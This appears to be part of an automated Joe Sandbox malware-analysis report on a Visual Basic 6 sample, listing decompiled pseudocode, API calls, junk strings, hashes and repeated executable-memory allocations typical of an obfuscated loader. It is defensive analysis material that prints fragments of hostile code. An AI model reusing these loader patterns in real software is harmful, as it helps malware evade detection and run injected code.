          • Instruction ID: e01d60fba52cd17f27b1ff523525a2b18ef3ccef428ec1e0229f810d74e07582
          • Opcode Fuzzy Hash: a7af0549e2f10f762b6e209b8676b3ff17c3df8b27577f8ac6b6928b1a0aad03
          • Instruction Fuzzy Hash: 7F711671901208EFDB00EFA1CD46BEEBBB5BF04704F54842AF445BB1A1DB795A85DB18
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00415268, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 135COMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 44%
          			E00415268(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char* _v160;
				intOrPtr _v168;
				char* _v268;
				short _v272;
				char* _t61;
				char* _t62;
				char* _t68;
				void* _t95;
				void* _t97;
				intOrPtr _t98;

				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L004016F0();
				_v16 = _t98;
				_v12 = 0x401520;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t95);
				_push(0x54c27c);
				_push(L"bangsternears");
				_t61 =  &_v40;
				_push(_t61);
				L004018D6();
				_push(_t61);
				_push(L"hjlrd");
				_t62 =  &_v36;
				_push(_t62);
				L004018D6();
				_push(_t62);
				_push(0x4c69df);
				_push(0x98e72e79);
				_push(0x8904d3f8); // executed
				E0041169C(); // executed
				_v268 = _t62;
				L004018D0();
				_v272 =  ~(0 | _v268 == 0x8904d3f8);
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L004018CA();
				_t68 = _v272;
				if(_t68 != 0) {
					_push(0);
					_push(L"Indpiskedes");
					_push( &_v56);
					L00401918();
					_t68 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L00401912();
				}
				_push(0x79b3bd);
				E00411914();
				_v268 = _t68;
				L004018D0();
				if(_v268 == 0x750289) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v160 = L"NOSTER";
					_v168 = 8;
					L004018A0();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L0040187C();
					L00401882();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t68 =  &_v56;
					_push(_t68);
					_push(7);
					L00401942();
				}
				_push(0x4154ac);
				L00401924();
				L004018AC();
				return _t68;
			}

































          0x0041526b
          0x0041527a
          0x00415286
          0x0041528e
          0x00415291
          0x00415298
          0x004152a7
          0x004152aa
          0x004152af
          0x004152b4
          0x004152b7
          0x004152b8
          0x004152bd
          0x004152be
          0x004152c3
          0x004152c6
          0x004152c7
          0x004152cc
          0x004152cd
          0x004152d2
          0x004152d7
          0x004152dc
          0x004152e1
          0x004152e7
          0x004152fd
          0x00415307
          0x0041530b
          0x0041530c
          0x0041530e
          0x00415316
          0x0041531f
          0x00415321
          0x00415323
          0x0041532b
          0x0041532c
          0x00415333
          0x00415334
          0x0041533e
          0x0041533f
          0x00415340
          0x00415341
          0x00415342
          0x00415344
          0x00415347
          0x0041534f
          0x0041534f
          0x00415354
          0x00415359
          0x0041535e
          0x00415364
          0x00415373
          0x00415379
          0x00415383
          0x0041538d
          0x00415394
          0x0041539e
          0x004153a5
          0x004153ac
          0x004153b3
          0x004153ba
          0x004153c1
          0x004153c8
          0x004153cf
          0x004153d6
          0x004153e0
          0x004153f3
          0x004153fe
          0x00415405
          0x00415409
          0x0041540d
          0x00415411
          0x00415415
          0x00415419
          0x0041541a
          0x00415424
          0x0041542f
          0x00415436
          0x0041543a
          0x0041543e
          0x00415442
          0x00415446
          0x00415447
          0x0041544a
          0x0041544b
          0x0041544d
          0x00415452
          0x00415455
          0x0041549e
          0x004154a6
          0x004154ab

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415286
          • __vbaStrToAnsi.MSVBVM60(0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152B8
          • __vbaStrToAnsi.MSVBVM60(?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152C7
          • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,004C69DF,00000000,?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004152E7
          • __vbaFreeStrList.MSVBVM60(00000002,?,0054C27C), ref: 0041530E
          • #716.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 0041532C
          • __vbaChkstk.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 00415334
          • __vbaLateIdSt.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 00415347
          • __vbaFreeVar.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 0041534F
          • __vbaSetSystemError.MSVBVM60(0079B3BD,?,?,004016F6), ref: 00415364
          • __vbaVarDup.MSVBVM60 ref: 004153F3
          • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041541A
          • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00415424
          • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041544D
          • __vbaFreeStr.MSVBVM60(004154AC), ref: 0041549E
          • __vbaFreeObj.MSVBVM60(004154AC), ref: 004154A6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$AnsiChkstkErrorListSystem$#596#716LateMove
          • String ID: Indpiskedes$NOSTER$bangsternears$hjlrd
          • API String ID: 2424355990-1043710842
          • Opcode ID: 81f8d63ecd90b5757c22fb64523531df8668fff5e84910bdd845b366f698622c
          • Instruction ID: ce894af612394e7026e56e7eb93882ba838e82bcec8e4c1f7873085a40d20675
          • Opcode Fuzzy Hash: 81f8d63ecd90b5757c22fb64523531df8668fff5e84910bdd845b366f698622c
          • Instruction Fuzzy Hash: 1751FAB2D4020CAADB11EFA1C945BDEB7B8EF04304F20806AF205B7191DBB95B89CF54
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00415068, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 489 415068-4150fb __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 490 415107-41512f 489->490 491 4150fd-415102 #532 489->491 491->490
          C-Code - Quality: 42%
          			E00415068(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v44;
				char _v60;
				char* _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v108;
				short _v112;
				short _t23;
				short _t26;
				intOrPtr _t35;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t35;
				_push(0x60);
				L004016F0();
				_v12 = _t35;
				_v8 = 0x4014f8;
				_v84 = L"12-12-12";
				_v92 = 8;
				L004018A0();
				_push(1);
				_push(1);
				_push( &_v44);
				_push(0x411c90);
				_push( &_v60); // executed
				L00401822(); // executed
				_v100 = 0xc;
				_v108 = 0x8002;
				_push( &_v60);
				_t23 =  &_v108;
				_push(_t23);
				L00401828();
				_v112 = _t23;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401942();
				_t26 = _v112;
				if(_t26 != 0) {
					_push(L"ankergangs");
					L00401894();
				}
				_v28 =  *0x4014f0;
				asm("wait");
				_push(0x415130);
				return _t26;
			}
















          0x0041506d
          0x00415078
          0x00415079
          0x00415080
          0x00415083
          0x0041508b
          0x0041508e
          0x00415095
          0x0041509c
          0x004150a9
          0x004150ae
          0x004150b0
          0x004150b5
          0x004150b6
          0x004150be
          0x004150bf
          0x004150c4
          0x004150cb
          0x004150d5
          0x004150d6
          0x004150d9
          0x004150da
          0x004150df
          0x004150e6
          0x004150ea
          0x004150eb
          0x004150ed
          0x004150f5
          0x004150fb
          0x004150fd
          0x00415102
          0x00415102
          0x0041510d
          0x00415110
          0x00415111
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415083
          • __vbaVarDup.MSVBVM60 ref: 004150A9
          • #663.MSVBVM60(?,00411C90,?,00000001,00000001), ref: 004150BF
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,00411C90,?,00000001,00000001), ref: 004150DA
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,00411C90,?,00000001,00000001), ref: 004150ED
          • #532.MSVBVM60(ankergangs), ref: 00415102
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#532#663ChkstkFreeList
          • String ID: 12-12-12$ankergangs
          • API String ID: 2176192853-2523394133
          • Opcode ID: 34089ffcb03df8dc18ef8706fa4cd4cd8b7f12f149141d495d4d41a869cb5dfa
          • Instruction ID: c34c4213d746cc0dc69b867a437d4921af468d752f493f1137ff5ccf605005f6
          • Opcode Fuzzy Hash: 34089ffcb03df8dc18ef8706fa4cd4cd8b7f12f149141d495d4d41a869cb5dfa
          • Instruction Fuzzy Hash: 6E11FBB1D4064CAADB01EBD1D846FEEBBBCEB44B44F50442AF100BA191E7B95584CBA9
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0041593D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 493 41593d-41598d __vbaChkstk call 411884 __vbaSetSystemError 496 415a05-415a1b 493->496 497 41598f-415996 493->497 498 4159b0 497->498 499 415998-4159ae __vbaNew2 497->499 501 4159b7-4159e0 __vbaObjSetAddref 498->501 499->501 503 4159e2-4159f7 __vbaHresultCheckObj 501->503 504 4159f9 501->504 505 4159fd-415a00 __vbaFreeObj 503->505 504->505 505->496
          C-Code - Quality: 57%
          			E0041593D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				signed int _t24;
				char* _t27;
				intOrPtr _t37;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_t24 = 0x20;
				L004016F0();
				_v12 = _t37;
				_v8 = 0x401560;
				_push(0x3090b5);
				_push(0x8904d3f8);
				_push(0x8904d3f8); // executed
				E00411884(); // executed
				_v32 = _t24;
				L004018D0();
				if(_v32 == 0x2ab3a6) {
					if( *0x4183d8 != 0) {
						_v48 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v48 = 0x4183d8;
					}
					_v36 =  *_v48;
					_t27 =  &_v28;
					L004018BE();
					_t24 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t27, _t27, _a4);
					asm("fclex");
					_v40 = _t24;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x411ad0);
						_push(_v36);
						_push(_v40);
						L00401906();
						_v52 = _t24;
					}
					L004018AC();
				}
				_v24 = 0x3e59;
				_push(0x415a1c);
				return _t24;
			}















          0x00415942
          0x0041594d
          0x0041594e
          0x00415957
          0x00415958
          0x00415960
          0x00415963
          0x0041596a
          0x0041596f
          0x00415974
          0x00415979
          0x0041597e
          0x00415981
          0x0041598d
          0x00415996
          0x004159b0
          0x00415998
          0x00415998
          0x0041599d
          0x004159a2
          0x004159a7
          0x004159a7
          0x004159bc
          0x004159c2
          0x004159c6
          0x004159d4
          0x004159d7
          0x004159d9
          0x004159e0
          0x004159f9
          0x004159e2
          0x004159e2
          0x004159e4
          0x004159e9
          0x004159ec
          0x004159ef
          0x004159f4
          0x004159f4
          0x00415a00
          0x00415a00
          0x00415a05
          0x00415a0b
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415958
          • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415981
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 004159A2
          • __vbaObjSetAddref.MSVBVM60(?,?,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 004159C6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010,?,?,?,?,?,?,004016F6), ref: 004159EF
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004016F6), ref: 00415A00
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$AddrefCheckChkstkErrorFreeHresultNew2System
          • String ID: Y>
          • API String ID: 3092135765-3955353929
          • Opcode ID: daf84958c5e3a6200ed88768f6025a689affe214ff534318e7b3d931a58596e6
          • Instruction ID: 05ffcd4c2287ab0b5148b41b0bb9954bea56509de74fcc4f12fad6ba98ae8c0f
          • Opcode Fuzzy Hash: daf84958c5e3a6200ed88768f6025a689affe214ff534318e7b3d931a58596e6
          • Instruction Fuzzy Hash: 2D2148B0D50708EBCF00AB95C845BDEBBB4EB08744F10456AF500B61A1D7B929809B69
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401968, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 610COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 506 401968-401978 #100 507 40197a-4019ac 506->507 508 401a13-401a1d 507->508 509 4019ae-4019ba 507->509 511 401a91-401a94 508->511 512 401a1f-401a34 508->512 510 4019bc-4019cb 509->510 510->507 513 4019cd 510->513 516 401a95-401a9a 511->516 517 401a4e-401a8f 511->517 514 401a36-401a4d 512->514 515 401a9c 512->515 513->510 518 4019cf-4019d7 513->518 514->517 521 401acc-401e04 515->521 522 401a9f-401abd 515->522 516->515 517->511 518->508 523 401e06-401e71 521->523 522->521 523->523 524 401e73-401e95 523->524
          C-Code - Quality: 90%
          			_entry_(signed int __eax, void* __ebx, void* __edx) {
				intOrPtr* _t5;

				_push("VB5!6&*"); // executed
				L00401960(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t5 = __eax + 1;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *((intOrPtr*)(__ebx - 0x604c4d3d)) =  *((intOrPtr*)(__ebx - 0x604c4d3d)) + __edx;
				return __ebx;
			}




          0x00401968
          0x0040196d
          0x00401972
          0x00401974
          0x00401976
          0x00401978
          0x0040197a
          0x0040197c
          0x0040197d
          0x0040197f
          0x00401981
          0x00401983
          0x00401985

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: #100
          • String ID: VB5!6&*
          • API String ID: 1341478452-3593831657
          • Opcode ID: 3e4ab4c0f6b93dab2893aa36d90813d0b26029a8ea59cdd29ad1e1e64e70e738
          • Instruction ID: 22f0427cd30c477063d476950ab16c50c77b4c44e7291ad08b44288221de2275
          • Opcode Fuzzy Hash: 3e4ab4c0f6b93dab2893aa36d90813d0b26029a8ea59cdd29ad1e1e64e70e738
          • Instruction Fuzzy Hash: 2F42643558F3C28FCB434B708D611917FB1AE1726475E00EBC8809E4B3E2AD5C8ADB62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A588, Relevance: 1.9, APIs: 1, Instructions: 670memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a870327af49fc829c68e3a212f49dcd0fe5e2b03a84ecfdfbb8ae05edc6c9268
          • Instruction ID: 2ac516b0689afb8bcb884ecfcafc2f3768ee7b20b4bf0ae203909c5422a6f353
          • Opcode Fuzzy Hash: a870327af49fc829c68e3a212f49dcd0fe5e2b03a84ecfdfbb8ae05edc6c9268
          • Instruction Fuzzy Hash: 6DF1CB82A2A70689FFB22160C5D071D6980DF16385F718F3BDD61F58E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A585, Relevance: 1.9, APIs: 1, Instructions: 648memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 735b598f10bf07c8912f81eb5c9c77704902051a3e1b2441906b48e2d2e5b669
          • Instruction ID: 807ccc12e0f7f2ffb699d33e77619acf9edf787ad458807e9a4eedef85388390
          • Opcode Fuzzy Hash: 735b598f10bf07c8912f81eb5c9c77704902051a3e1b2441906b48e2d2e5b669
          • Instruction Fuzzy Hash: 72F1CB81A2A70689FFB22160C5D071D6980DF16385F718F3BD961F58E2A71FC6CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A621, Relevance: 1.9, APIs: 1, Instructions: 611memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 0d9118e3824e240baef12077212766c2091842aca75622a94b6788747a8f954c
          • Instruction ID: 45d20b20a92e5e9d1f48ce68232dd31ec7ef10426473f68ee6f0306a288c2a86
          • Opcode Fuzzy Hash: 0d9118e3824e240baef12077212766c2091842aca75622a94b6788747a8f954c
          • Instruction Fuzzy Hash: ECF1CD81A2A70689FFB22160C5D071D6980DF16385F718F3BD861F59E2A71FC6CE158B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A6B8, Relevance: 1.8, APIs: 1, Instructions: 593memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 7b409998e7a2624269b1e9867940b083bcf58449ff535d896c47fa011a46069d
          • Instruction ID: c54e73c3d323a95c587366cfb6aed5ff1e8008128157bde069087f22b7e88860
          • Opcode Fuzzy Hash: 7b409998e7a2624269b1e9867940b083bcf58449ff535d896c47fa011a46069d
          • Instruction Fuzzy Hash: 67F1CD81A2A70689FFB22160C5D071D6980DF16385F718F3BD861F59E2A71FC6CE168B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A909, Relevance: 1.8, APIs: 1, Instructions: 567memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: ddc6aa0afbd3414f20353239f5851d19e61738a4148a3888739cff35583429af
          • Instruction ID: 2a0da5b14954853fc2a2adbc61ecdf0f74b5ac0c1bf4298116e99700e24bad04
          • Opcode Fuzzy Hash: ddc6aa0afbd3414f20353239f5851d19e61738a4148a3888739cff35583429af
          • Instruction Fuzzy Hash: ABD1CC82A2A70689FFB22160C4D071D6980DF16385F318F37DC61F59E2A75F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A873, Relevance: 1.8, APIs: 1, Instructions: 555memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: f1e4dc4efb29c05f5923d96c1962d0646732043ddc74a4afce532c1cfcd2e9a5
          • Instruction ID: f9cc1e3df359ec3ae265d6420f780488e67cb8c19be8630c56b3cafeec40b7ec
          • Opcode Fuzzy Hash: f1e4dc4efb29c05f5923d96c1962d0646732043ddc74a4afce532c1cfcd2e9a5
          • Instruction Fuzzy Hash: 0FE1EE86A2A70689EFB22160C4D071D6980DF16385F318F3BDC61F55E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AAB5, Relevance: 1.8, APIs: 1, Instructions: 522memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: c5a0288088ea6353ecb2abc1b2a332549d71694029d4b7c51d27ea29b9baa33a
          • Instruction ID: 8bf2856224838cfddfb45e726a25184f7b3e22c5227c3ffca6f970a1b8fd7a82
          • Opcode Fuzzy Hash: c5a0288088ea6353ecb2abc1b2a332549d71694029d4b7c51d27ea29b9baa33a
          • Instruction Fuzzy Hash: F9C1ED8292A70689FFB32160C4D071DA980DF16385F718F3BC861F55E2A71F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A9A2, Relevance: 1.8, APIs: 1, Instructions: 507memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 1c25cb97dc6c5f7831724c50f6ec68b001a5d18fc78821fcf7c154c070cb1e1e
          • Instruction ID: 9886ed38e547ba6dfd60999ca54f86dca80979e1656329bfaacfc7b0ebb8ea5c
          • Opcode Fuzzy Hash: 1c25cb97dc6c5f7831724c50f6ec68b001a5d18fc78821fcf7c154c070cb1e1e
          • Instruction Fuzzy Hash: 9BD1DD82A2A70689FFB22160C4D071D6980DF16386F718F37C861F55E2A75F86CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040AA2D, Relevance: 1.7, APIs: 1, Instructions: 492memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 388e78611c631fd9fbcfbe3019b2e0dc820cd414c1440ca47ed785a6b4eb90d3
          • Instruction ID: 5a904b66249a45dd8a487ebb27cd201869986bb4787ddcb28e8428202934cd84
          • Opcode Fuzzy Hash: 388e78611c631fd9fbcfbe3019b2e0dc820cd414c1440ca47ed785a6b4eb90d3
          • Instruction Fuzzy Hash: 57D1ED8292A70689FFB22160C4D071D6980DF16385F718F3BC861F65E2A75FC6CE169B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040ABEA, Relevance: 1.7, APIs: 1, Instructions: 482memoryCOMMON
          Download Yara Rule
          APIs
